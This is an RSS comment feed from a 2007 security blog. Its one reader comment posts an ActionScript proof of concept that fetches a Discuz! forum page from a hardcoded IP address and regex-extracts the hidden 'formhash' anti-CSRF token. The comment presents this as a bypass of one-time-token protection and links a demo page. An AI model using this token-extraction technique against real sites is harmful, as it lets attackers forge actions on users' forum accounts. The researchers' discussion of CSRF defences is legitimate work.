<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: CSK update</title>
	<atom:link href="http://www.thespanner.co.uk/2007/11/19/csk-update-2/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thespanner.co.uk/2007/11/19/csk-update-2/</link>
	<description>A tool for designers dealing with programmers dealing with designers...</description>
	<pubDate>Tue, 14 Oct 2008 01:44:22 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
		<item>
		<title>By: Iehrepus</title>
		<link>http://www.thespanner.co.uk/2007/11/19/csk-update-2/#comment-873</link>
		<dc:creator>Iehrepus</dc:creator>
		<pubDate>Tue, 20 Nov 2007 14:35:51 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/19/csk-update-2/#comment-873</guid>
		<description>I had pass [Preventing CSRF:One-Time Tokens] by as, like this i get forumhash in Discuz! bbs:

import RegExp;
url='http://60.190.243.111/superhei/ieav/flash/';
var xml:XML = new XML();

xml.onData = function(s) {

	tb1.text = getFirstMatch(new RegExp("&#60;input type=\"hidden\" name=\"formhash\" id=\"formhash\" value=\"(\\w+)\"&#62;", "ig"), s, 1);
}

xml.load(url+"post.htm");

Demo:http://60.190.243.111/superhei/ieav/flash/cd1.html</description>
		<content:encoded><![CDATA[<p>I had pass [Preventing CSRF:One-Time Tokens] by as, like this i get forumhash in Discuz! bbs:</p>
<p>import RegExp;<br />
url=&#8217;http://60.190.243.111/superhei/ieav/flash/&#8217;;<br />
var xml:XML = new XML();</p>
<p>xml.onData = function(s) {</p>
<p>	tb1.text = getFirstMatch(new RegExp(&#8221;&lt;input type=\&#8221;hidden\&#8221; name=\&#8221;formhash\&#8221; id=\&#8221;formhash\&#8221; value=\&#8221;(\\w+)\&#8221;&gt;&#8221;, &#8220;ig&#8221;), s, 1);<br />
}</p>
<p>xml.load(url+&#8221;post.htm&#8221;);</p>
<p>Demo:http://60.190.243.111/superhei/ieav/flash/cd1.html</p>
]]></content:encoded>
	</item>
</channel>
</rss>
